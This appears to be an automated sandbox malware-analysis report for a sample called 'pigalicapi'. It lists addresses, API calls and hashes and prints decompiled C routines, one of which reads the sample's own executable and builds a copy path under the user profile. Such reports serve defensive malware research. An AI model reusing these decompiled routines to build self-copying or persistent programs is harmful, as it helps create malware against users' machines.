                                                                                                                                                                                                                                                                            0x01176bc9
                                                                                                                                                                                                                                                                            0x01176bd0
                                                                                                                                                                                                                                                                            0x01176b4b
                                                                                                                                                                                                                                                                            0x01176b51
                                                                                                                                                                                                                                                                            0x01176b57
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01176b60
                                                                                                                                                                                                                                                                            0x01176b6d
                                                                                                                                                                                                                                                                            0x01176b72
                                                                                                                                                                                                                                                                            0x01176b75
                                                                                                                                                                                                                                                                            0x01176b7b
                                                                                                                                                                                                                                                                            0x01176b82
                                                                                                                                                                                                                                                                            0x01176b84
                                                                                                                                                                                                                                                                            0x01176b87
                                                                                                                                                                                                                                                                            0x01176b8b
                                                                                                                                                                                                                                                                            0x01176b99
                                                                                                                                                                                                                                                                            0x01176b9e
                                                                                                                                                                                                                                                                            0x01176b9e
                                                                                                                                                                                                                                                                            0x01176ba1
                                                                                                                                                                                                                                                                            0x01176ba7
                                                                                                                                                                                                                                                                            0x01176baa
                                                                                                                                                                                                                                                                            0x01176bb8
                                                                                                                                                                                                                                                                            0x01176bbd
                                                                                                                                                                                                                                                                            0x01176bbd
                                                                                                                                                                                                                                                                            0x01176bc0
                                                                                                                                                                                                                                                                            0x01176bc0
                                                                                                                                                                                                                                                                            0x01176bc7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01176b49
                                                                                                                                                                                                                                                                            0x01176761
                                                                                                                                                                                                                                                                            0x0117676b
                                                                                                                                                                                                                                                                            0x01176775
                                                                                                                                                                                                                                                                            0x0117677f
                                                                                                                                                                                                                                                                            0x01176785
                                                                                                                                                                                                                                                                            0x01176788
                                                                                                                                                                                                                                                                            0x0117685c
                                                                                                                                                                                                                                                                            0x01176861
                                                                                                                                                                                                                                                                            0x01176864
                                                                                                                                                                                                                                                                            0x0117678e
                                                                                                                                                                                                                                                                            0x01176797
                                                                                                                                                                                                                                                                            0x011767ad
                                                                                                                                                                                                                                                                            0x011767b3
                                                                                                                                                                                                                                                                            0x011767b9
                                                                                                                                                                                                                                                                            0x011767c0
                                                                                                                                                                                                                                                                            0x011767dc
                                                                                                                                                                                                                                                                            0x011767e1
                                                                                                                                                                                                                                                                            0x011767e7
                                                                                                                                                                                                                                                                            0x011767f0
                                                                                                                                                                                                                                                                            0x011767f5
                                                                                                                                                                                                                                                                            0x011767f8
                                                                                                                                                                                                                                                                            0x011767fe
                                                                                                                                                                                                                                                                            0x01176804
                                                                                                                                                                                                                                                                            0x01176807
                                                                                                                                                                                                                                                                            0x01176819
                                                                                                                                                                                                                                                                            0x0117681f
                                                                                                                                                                                                                                                                            0x0117683a
                                                                                                                                                                                                                                                                            0x0117683f
                                                                                                                                                                                                                                                                            0x0117683f
                                                                                                                                                                                                                                                                            0x01176807
                                                                                                                                                                                                                                                                            0x01176850
                                                                                                                                                                                                                                                                            0x01176850
                                                                                                                                                                                                                                                                            0x01176856
                                                                                                                                                                                                                                                                            0x0117686a
                                                                                                                                                                                                                                                                            0x01176871
                                                                                                                                                                                                                                                                            0x01176877
                                                                                                                                                                                                                                                                            0x0117687a
                                                                                                                                                                                                                                                                            0x0117687e
                                                                                                                                                                                                                                                                            0x0117688c
                                                                                                                                                                                                                                                                            0x01176891
                                                                                                                                                                                                                                                                            0x01176891
                                                                                                                                                                                                                                                                            0x01176894
                                                                                                                                                                                                                                                                            0x0117689a
                                                                                                                                                                                                                                                                            0x0117689d
                                                                                                                                                                                                                                                                            0x011768a5
                                                                                                                                                                                                                                                                            0x011768aa
                                                                                                                                                                                                                                                                            0x011768ad
                                                                                                                                                                                                                                                                            0x011768b9
                                                                                                                                                                                                                                                                            0x011768bf
                                                                                                                                                                                                                                                                            0x011768c5
                                                                                                                                                                                                                                                                            0x011768c8
                                                                                                                                                                                                                                                                            0x01176902
                                                                                                                                                                                                                                                                            0x0117690a
                                                                                                                                                                                                                                                                            0x0117690d
                                                                                                                                                                                                                                                                            0x01176920
                                                                                                                                                                                                                                                                            0x01176925
                                                                                                                                                                                                                                                                            0x01176931
                                                                                                                                                                                                                                                                            0x01176931
                                                                                                                                                                                                                                                                            0x011768ca
                                                                                                                                                                                                                                                                            0x011768d6
                                                                                                                                                                                                                                                                            0x011768e4
                                                                                                                                                                                                                                                                            0x011768e4
                                                                                                                                                                                                                                                                            0x0117693a
                                                                                                                                                                                                                                                                            0x0117693d
                                                                                                                                                                                                                                                                            0x0117694b
                                                                                                                                                                                                                                                                            0x0117695a
                                                                                                                                                                                                                                                                            0x01176971
                                                                                                                                                                                                                                                                            0x01176977
                                                                                                                                                                                                                                                                            0x01176984
                                                                                                                                                                                                                                                                            0x01176984
                                                                                                                                                                                                                                                                            0x0117693d
                                                                                                                                                                                                                                                                            0x0117698a
                                                                                                                                                                                                                                                                            0x01176990
                                                                                                                                                                                                                                                                            0x01176993
                                                                                                                                                                                                                                                                            0x011769a1
                                                                                                                                                                                                                                                                            0x011769a6
                                                                                                                                                                                                                                                                            0x011769a6
                                                                                                                                                                                                                                                                            0x011769a9
                                                                                                                                                                                                                                                                            0x011769a9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011769b0
                                                                                                                                                                                                                                                                            0x01176667
                                                                                                                                                                                                                                                                            0x0117666d
                                                                                                                                                                                                                                                                            0x01176674
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01176689
                                                                                                                                                                                                                                                                            0x01176693
                                                                                                                                                                                                                                                                            0x01176698
                                                                                                                                                                                                                                                                            0x0117669b
                                                                                                                                                                                                                                                                            0x011766a7
                                                                                                                                                                                                                                                                            0x011766b8
                                                                                                                                                                                                                                                                            0x011766c6
                                                                                                                                                                                                                                                                            0x011766d5
                                                                                                                                                                                                                                                                            0x011766e4
                                                                                                                                                                                                                                                                            0x011766f0
                                                                                                                                                                                                                                                                            0x011766ff
                                                                                                                                                                                                                                                                            0x0117670e
                                                                                                                                                                                                                                                                            0x0117671d
                                                                                                                                                                                                                                                                            0x0117673a
                                                                                                                                                                                                                                                                            0x01176747
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01176747
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01176642
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011765fe
                                                                                                                                                                                                                                                                            0x011764ae
                                                                                                                                                                                                                                                                            0x011764b4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011764cb
                                                                                                                                                                                                                                                                            0x011764dc
                                                                                                                                                                                                                                                                            0x011764ed
                                                                                                                                                                                                                                                                            0x011764f2
                                                                                                                                                                                                                                                                            0x0117651a
                                                                                                                                                                                                                                                                            0x0117653f
                                                                                                                                                                                                                                                                            0x01176545
                                                                                                                                                                                                                                                                            0x0117654c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01176552
                                                                                                                                                                                                                                                                            0x0117655c
                                                                                                                                                                                                                                                                            0x0117657e
                                                                                                                                                                                                                                                                            0x01176584
                                                                                                                                                                                                                                                                            0x01176586
                                                                                                                                                                                                                                                                            0x011765dd
                                                                                                                                                                                                                                                                            0x011765dd
                                                                                                                                                                                                                                                                            0x011765e4
                                                                                                                                                                                                                                                                            0x011765ed
                                                                                                                                                                                                                                                                            0x011765ed
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011765e4
                                                                                                                                                                                                                                                                            0x0117658e
                                                                                                                                                                                                                                                                            0x01176591
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011765a0
                                                                                                                                                                                                                                                                            0x011765a6
                                                                                                                                                                                                                                                                            0x011765b2
                                                                                                                                                                                                                                                                            0x011765b7
                                                                                                                                                                                                                                                                            0x011765ba
                                                                                                                                                                                                                                                                            0x011765c0
                                                                                                                                                                                                                                                                            0x011765c7
                                                                                                                                                                                                                                                                            0x011765d8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011765d8
                                                                                                                                                                                                                                                                            0x011765c9
                                                                                                                                                                                                                                                                            0x011765d0
                                                                                                                                                                                                                                                                            0x011765d0
                                                                                                                                                                                                                                                                            0x01176464
                                                                                                                                                                                                                                                                            0x0117646d
                                                                                                                                                                                                                                                                            0x01176476
                                                                                                                                                                                                                                                                            0x01176479
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117647b
                                                                                                                                                                                                                                                                            0x01176c33
                                                                                                                                                                                                                                                                            0x01176c36
                                                                                                                                                                                                                                                                            0x01176c44
                                                                                                                                                                                                                                                                            0x01176c38
                                                                                                                                                                                                                                                                            0x01176c38
                                                                                                                                                                                                                                                                            0x01176c38
                                                                                                                                                                                                                                                                            0x01176c36
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011762e0

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 011763BD
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 01176408
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                            • String ID: Lyoxokxeruqp$TEMP$TEMP
                                                                                                                                                                                                                                                                            • API String ID: 2087232378-3648022833
                                                                                                                                                                                                                                                                            • Opcode ID: 03bb2d71b0608c67c1d6e7821fcd80f280ed5ed153c748e2f738850adb99553a
                                                                                                                                                                                                                                                                            • Instruction ID: 6cc271630d657590d8c1fdd39f273b745ef2c172464bab1aad8da0de6357f5a9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 03bb2d71b0608c67c1d6e7821fcd80f280ed5ed153c748e2f738850adb99553a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 015230B5A00619DFEB28DF94DC84FADB7B5FB48304F148598E519A7384D770AA80CF50
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                                                                            			E01174020(intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
                                                                                                                                                                                                                                                                            				signed int _v5;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				struct _CRITICAL_SECTION _v44;
                                                                                                                                                                                                                                                                            				long _v48;
                                                                                                                                                                                                                                                                            				void* _v52;
                                                                                                                                                                                                                                                                            				void _v56;
                                                                                                                                                                                                                                                                            				long _v60;
                                                                                                                                                                                                                                                                            				HANDLE* _v64;
                                                                                                                                                                                                                                                                            				void* _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				void* _v76;
                                                                                                                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                                                                                                                            				void _v92;
                                                                                                                                                                                                                                                                            				long _v96;
                                                                                                                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                                                                                                                            				HANDLE* _v104;
                                                                                                                                                                                                                                                                            				HANDLE* _v108;
                                                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                                                            				void* _t141;
                                                                                                                                                                                                                                                                            				void* _t188;
                                                                                                                                                                                                                                                                            				void* _t189;
                                                                                                                                                                                                                                                                            				void* _t191;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 > 0) {
                                                                                                                                                                                                                                                                            					E01177D20( &_v56,  &_v56, 0, 0x29);
                                                                                                                                                                                                                                                                            					_t189 = _t188 + 0xc;
                                                                                                                                                                                                                                                                            					InitializeCriticalSection( &_v44);
                                                                                                                                                                                                                                                                            					_v16 = _a24;
                                                                                                                                                                                                                                                                            					_v20 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                                                                                                                            					_v12 = _a8 / _a20;
                                                                                                                                                                                                                                                                            					_v60 = 0;
                                                                                                                                                                                                                                                                            					while(_v60 < _a16) {
                                                                                                                                                                                                                                                                            						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                            						if(_v52 != 0) {
                                                                                                                                                                                                                                                                            							VirtualFree(_v52, 0, 0x8000);
                                                                                                                                                                                                                                                                            							_v52 = 0;
                                                                                                                                                                                                                                                                            							_v48 = 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t198 = _v56;
                                                                                                                                                                                                                                                                            						if(_v56 != 0) {
                                                                                                                                                                                                                                                                            							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                            							_v56 = 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						ResetEvent(_v20);
                                                                                                                                                                                                                                                                            						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                            						_t114 = CreateThread(0, 0, E01174AC0,  &_v56, 0, 0); // executed
                                                                                                                                                                                                                                                                            						_v56 = _t114;
                                                                                                                                                                                                                                                                            						_v104 = E011797A0( ~(0 | _t198 > 0x00000000) | _a20 * 0x00000004);
                                                                                                                                                                                                                                                                            						_v64 = _v104;
                                                                                                                                                                                                                                                                            						E01177D20(_v104, _v64, 0, _a20 << 2);
                                                                                                                                                                                                                                                                            						_t191 = _t189 + 0x10;
                                                                                                                                                                                                                                                                            						_v100 = 0;
                                                                                                                                                                                                                                                                            						while(_v100 < _a20) {
                                                                                                                                                                                                                                                                            							_v64[_v100] = 0;
                                                                                                                                                                                                                                                                            							E01177D20(_v64,  &_v92, 0, 0x1c);
                                                                                                                                                                                                                                                                            							_t191 = _t191 + 0xc;
                                                                                                                                                                                                                                                                            							_v68 =  &_v56;
                                                                                                                                                                                                                                                                            							_v72 = _a12;
                                                                                                                                                                                                                                                                            							_v92 = _a4;
                                                                                                                                                                                                                                                                            							_v84 = _v100 * _v12;
                                                                                                                                                                                                                                                                            							if(_v100 >= _a20 - 1) {
                                                                                                                                                                                                                                                                            								_v80 = _a8 - 1;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v80 = _v84 + _v12 - 1;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v76 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                            							_t141 = CreateThread(0, 0, E01174BA0,  &_v92, 0, 0); // executed
                                                                                                                                                                                                                                                                            							_v64[_v100] = _t141;
                                                                                                                                                                                                                                                                            							WaitForSingleObject(_v76, 0xffffffff);
                                                                                                                                                                                                                                                                            							FindCloseChangeNotification(_v76); // executed
                                                                                                                                                                                                                                                                            							_v100 = _v100 + 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						WaitForMultipleObjects(_a20, _v64, 1, 0xffffffff);
                                                                                                                                                                                                                                                                            						_v96 = WaitForSingleObject(_v20, 0x2710);
                                                                                                                                                                                                                                                                            						if(_v96 == 0) {
                                                                                                                                                                                                                                                                            							_v5 = 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v96 = WaitForSingleObject(_v56, 0x3e8);
                                                                                                                                                                                                                                                                            						if(_v96 != 0) {
                                                                                                                                                                                                                                                                            							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                            						if(_v52 != 0) {
                                                                                                                                                                                                                                                                            							VirtualFree(_v52, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            							_v52 = 0;
                                                                                                                                                                                                                                                                            							_v48 = 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                            						_v108 = _v64;
                                                                                                                                                                                                                                                                            						E011797C0(_v108);
                                                                                                                                                                                                                                                                            						_t189 = _t191 + 4;
                                                                                                                                                                                                                                                                            						if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            							_v60 = _v60 + 1;
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					DeleteCriticalSection( &_v44);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v5;
                                                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                                                            0x01174026
                                                                                                                                                                                                                                                                            0x0117402e
                                                                                                                                                                                                                                                                            0x0117405a
                                                                                                                                                                                                                                                                            0x0117405f
                                                                                                                                                                                                                                                                            0x01174066
                                                                                                                                                                                                                                                                            0x0117406f
                                                                                                                                                                                                                                                                            0x01174080
                                                                                                                                                                                                                                                                            0x01174086
                                                                                                                                                                                                                                                                            0x0117408a
                                                                                                                                                                                                                                                                            0x0117408d
                                                                                                                                                                                                                                                                            0x0117409f
                                                                                                                                                                                                                                                                            0x011740af
                                                                                                                                                                                                                                                                            0x011740b9
                                                                                                                                                                                                                                                                            0x011740c6
                                                                                                                                                                                                                                                                            0x011740cc
                                                                                                                                                                                                                                                                            0x011740d3
                                                                                                                                                                                                                                                                            0x011740d3
                                                                                                                                                                                                                                                                            0x011740da
                                                                                                                                                                                                                                                                            0x011740de
                                                                                                                                                                                                                                                                            0x011740e6
                                                                                                                                                                                                                                                                            0x011740ec
                                                                                                                                                                                                                                                                            0x011740ec
                                                                                                                                                                                                                                                                            0x011740f7
                                                                                                                                                                                                                                                                            0x01174101
                                                                                                                                                                                                                                                                            0x01174118
                                                                                                                                                                                                                                                                            0x0117411e
                                                                                                                                                                                                                                                                            0x0117413d
                                                                                                                                                                                                                                                                            0x01174143
                                                                                                                                                                                                                                                                            0x01174153
                                                                                                                                                                                                                                                                            0x01174158
                                                                                                                                                                                                                                                                            0x0117415b
                                                                                                                                                                                                                                                                            0x0117416d
                                                                                                                                                                                                                                                                            0x0117417f
                                                                                                                                                                                                                                                                            0x0117418e
                                                                                                                                                                                                                                                                            0x01174193
                                                                                                                                                                                                                                                                            0x01174199
                                                                                                                                                                                                                                                                            0x0117419f
                                                                                                                                                                                                                                                                            0x011741a5
                                                                                                                                                                                                                                                                            0x011741af
                                                                                                                                                                                                                                                                            0x011741bb
                                                                                                                                                                                                                                                                            0x011741d2
                                                                                                                                                                                                                                                                            0x011741bd
                                                                                                                                                                                                                                                                            0x011741c7
                                                                                                                                                                                                                                                                            0x011741c7
                                                                                                                                                                                                                                                                            0x011741e3
                                                                                                                                                                                                                                                                            0x011741f7
                                                                                                                                                                                                                                                                            0x01174203
                                                                                                                                                                                                                                                                            0x0117420c
                                                                                                                                                                                                                                                                            0x01174216
                                                                                                                                                                                                                                                                            0x0117416a
                                                                                                                                                                                                                                                                            0x0117416a
                                                                                                                                                                                                                                                                            0x0117422d
                                                                                                                                                                                                                                                                            0x01174242
                                                                                                                                                                                                                                                                            0x01174249
                                                                                                                                                                                                                                                                            0x0117424b
                                                                                                                                                                                                                                                                            0x0117424b
                                                                                                                                                                                                                                                                            0x0117425e
                                                                                                                                                                                                                                                                            0x01174265
                                                                                                                                                                                                                                                                            0x0117426d
                                                                                                                                                                                                                                                                            0x0117426d
                                                                                                                                                                                                                                                                            0x01174277
                                                                                                                                                                                                                                                                            0x01174281
                                                                                                                                                                                                                                                                            0x0117428e
                                                                                                                                                                                                                                                                            0x01174294
                                                                                                                                                                                                                                                                            0x0117429b
                                                                                                                                                                                                                                                                            0x0117429b
                                                                                                                                                                                                                                                                            0x011742a6
                                                                                                                                                                                                                                                                            0x011742af
                                                                                                                                                                                                                                                                            0x011742b6
                                                                                                                                                                                                                                                                            0x011742bb
                                                                                                                                                                                                                                                                            0x011742c4
                                                                                                                                                                                                                                                                            0x0117409c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011742c6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011742c4
                                                                                                                                                                                                                                                                            0x011742d1
                                                                                                                                                                                                                                                                            0x011742d1
                                                                                                                                                                                                                                                                            0x011742dd

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(?), ref: 01174066
                                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0117407A
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?), ref: 011740AF
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 011740C6
                                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,00000000), ref: 011740E6
                                                                                                                                                                                                                                                                            • ResetEvent.KERNEL32(00000000), ref: 011740F7
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 01174101
                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 01174118
                                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 011741DD
                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 011741F7
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0117420C
                                                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(?), ref: 01174216
                                                                                                                                                                                                                                                                            • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 0117422D
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 0117423C
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 01174258
                                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,00000000), ref: 0117426D
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 01174277
                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0117428E
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 011742A6
                                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,?), ref: 011742D1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$CreateThreadWait$EventObjectSingle$EnterFreeLeaveTerminateVirtual$ChangeCloseDeleteFindInitializeMultipleNotificationObjectsReset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1593741596-0
                                                                                                                                                                                                                                                                            • Opcode ID: d63f61402876a3ac89c59ec93de7b2a5e89fa01fac077d21d2e52df4f97d843d
                                                                                                                                                                                                                                                                            • Instruction ID: 56346e4335c34946f058ef7c61b49539989fab4ee872ce06c94e433f82782815
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d63f61402876a3ac89c59ec93de7b2a5e89fa01fac077d21d2e52df4f97d843d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA912A74A00309EFDB18DFA4E849BEDBB75BB48305F104129F915AB384D7749984CF91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                                                            			E01175700(CHAR* _a4) {
                                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                                                                            				long _v28;
                                                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                                                            				char _v556;
                                                                                                                                                                                                                                                                            				long _v560;
                                                                                                                                                                                                                                                                            				void* _v564;
                                                                                                                                                                                                                                                                            				long _v568;
                                                                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                                                                                                                                            					E01178F80(_a4, 0x100, _a4 + 0x437); // executed
                                                                                                                                                                                                                                                                            					GetModuleFileNameA(0, _a4 + 0x100, 0x104);
                                                                                                                                                                                                                                                                            					E01171CA0(_a4 + 0x204, 0x104); // executed
                                                                                                                                                                                                                                                                            					E01179D20( &_v24, _a4 + 0x40c, 0x27); // executed
                                                                                                                                                                                                                                                                            					E01177B70(_a4 + 0x45b,  &_v24, 0x10);
                                                                                                                                                                                                                                                                            					_t59 = E01175CD0(_a4 + 0x100); // executed
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_a4 + 0x433)) = _t59;
                                                                                                                                                                                                                                                                            					lstrcpyA(_a4 + 0x43b, "pigalicapi");
                                                                                                                                                                                                                                                                            					E01177D20( &_v556,  &_v556, 0, 0x208);
                                                                                                                                                                                                                                                                            					_v28 = 0x207;
                                                                                                                                                                                                                                                                            					if(( *0x118435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            						GetEnvironmentVariableA("USERPROFILE",  &_v556, 0x207); // executed
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						__imp__GetAllUsersProfileDirectoryA( &_v556,  &_v28);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					wnsprintfA(_a4 + 0x308, 0x104, "%s\\%s.exe",  &_v556, "pigalicapi");
                                                                                                                                                                                                                                                                            					_t67 = CreateFileA(_a4 + 0x100, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                            					_v32 = _t67;
                                                                                                                                                                                                                                                                            					if(_v32 != 0xffffffff) {
                                                                                                                                                                                                                                                                            						_v560 = GetFileSize(_v32, 0);
                                                                                                                                                                                                                                                                            						if(_v560 > 0) {
                                                                                                                                                                                                                                                                            							_t71 = VirtualAlloc(0, _v560, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            							_v564 = _t71;
                                                                                                                                                                                                                                                                            							if(_v564 != 0) {
                                                                                                                                                                                                                                                                            								_v568 = 0;
                                                                                                                                                                                                                                                                            								ReadFile(_v32, _v564, _v560,  &_v568, 0); // executed
                                                                                                                                                                                                                                                                            								if(_v568 != _v560) {
                                                                                                                                                                                                                                                                            									VirtualFree(_v564, 0, 0x8000);
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									 *(_a4 + 0x453) = _v560;
                                                                                                                                                                                                                                                                            									 *(_a4 + 0x457) = _v564;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						FindCloseChangeNotification(_v32); // executed
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v5 = 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v5;
                                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                                            0x01175709
                                                                                                                                                                                                                                                                            0x01175711
                                                                                                                                                                                                                                                                            0x01175729
                                                                                                                                                                                                                                                                            0x01175742
                                                                                                                                                                                                                                                                            0x01175756
                                                                                                                                                                                                                                                                            0x0117576e
                                                                                                                                                                                                                                                                            0x01175786
                                                                                                                                                                                                                                                                            0x01175798
                                                                                                                                                                                                                                                                            0x011757a3
                                                                                                                                                                                                                                                                            0x011757b8
                                                                                                                                                                                                                                                                            0x011757cc
                                                                                                                                                                                                                                                                            0x011757d4
                                                                                                                                                                                                                                                                            0x011757e4
                                                                                                                                                                                                                                                                            0x0117580a
                                                                                                                                                                                                                                                                            0x011757e6
                                                                                                                                                                                                                                                                            0x011757f1
                                                                                                                                                                                                                                                                            0x011757f1
                                                                                                                                                                                                                                                                            0x0117582f
                                                                                                                                                                                                                                                                            0x01175854
                                                                                                                                                                                                                                                                            0x0117585a
                                                                                                                                                                                                                                                                            0x01175861
                                                                                                                                                                                                                                                                            0x01175873
                                                                                                                                                                                                                                                                            0x01175880
